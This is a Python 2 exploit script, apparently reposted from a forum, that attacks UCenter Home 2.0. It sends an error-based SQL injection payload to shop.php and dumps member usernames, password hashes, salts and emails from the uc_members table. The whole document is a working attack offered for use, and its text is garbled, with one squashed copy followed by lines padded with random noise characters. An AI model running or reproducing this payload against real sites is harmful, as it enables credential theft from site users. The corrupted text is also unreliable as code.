#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
9 _3 C2 ^( |7 X . ^' h6 l: k) c2 j
- W4 x: _3 Z! H/ l9 B#!/usr/bin/env python t- n7 Y) E9 H3 Y! g
/ R/ p/ ]+ n- K8 |$ e- t
import sys
* E. p E4 B' x; Iimport urllib2 ; r8 h6 A6 x6 }, g( r ^* ]+ o1 E6 `
import re ; n2 ~5 K8 ^% t, ?6 s
% m' a4 e3 s$ J8 ~* f; `def info(): n% w# k B6 T. p _9 s3 ?8 R0 e
print 'From:http://www.exploit-db.com/exploits/14997/'
4 X' ?( n5 V* g1 A+ c) r$ \6 g print 'http://www.hake.cc/Web_loudong/' 4 J/ @$ a9 i4 G: Q: O
print 'changed:qiaoy' ' {( Y8 q5 {6 W( v0 }* a$ I
print 'exp:'
3 a+ Q0 @) Q& G% J print ' ./UCenter_Home_2.0.py site' 0 u! u. m1 l0 c; Y* d, P/ D
$ \* l% g$ i) {; p0 b
def main(): 9 m6 V# s/ F; |
if len(sys.argv) != 2: f3 e# \7 F* K5 p: v& U( f: ?# _0 i
info() # \5 X' a6 q; F. c* m
else: ! I; o2 h5 g) E, k
site = sys.argv[1]
/ v8 b+ S E. E0 W- m- k% _ if site[0:7] == 'http://': 7 j( [4 B4 J# g& Z$ O7 Z8 v
sitesite =site
: F& n# \% h9 X o elif site[0:8] == 'https://': 4 S. z6 A' u. u! v
sitesite = site ^! ?+ g( ]0 A" Q
else:
V T' c9 L9 g; f0 c6 C site = 'http://'+site
Q5 f* S* Z2 B( [0 H try:
, }/ ^, s9 s) k: v4 K/ n$ N) N url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
5 J6 g8 D# A$ g( o# O5 @ Value = urllib2.urlopen(url).read() 7 c( s& F' ?- f7 V) I) h3 ?& J. |
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
) Z4 ~3 |: d& R* U B) G hacked = Msg.split(':')
/ c! i/ a2 Z3 O4 V1 B print 'Name: '+hacked[1]
% z6 z, ?3 d' s print 'Passwd: '+hacked[2] : G" S; Z( `- S7 C
print 'salt: '+hacked[3] 1 U- H; D I6 |6 I, A9 }9 k
print 'email: '+hacked[4]
0 w1 M) }$ L0 {; ^ except:
7 J3 @7 [( z% h8 O' d print 'Sorry,I can\'t work............'
( j& n, u$ l) j3 o( I' \ . P0 F i8 E& c1 L( o$ J2 M# B
if __name__ == '__main__':
% T7 O m0 g5 L! V- \# H; R4 m main() |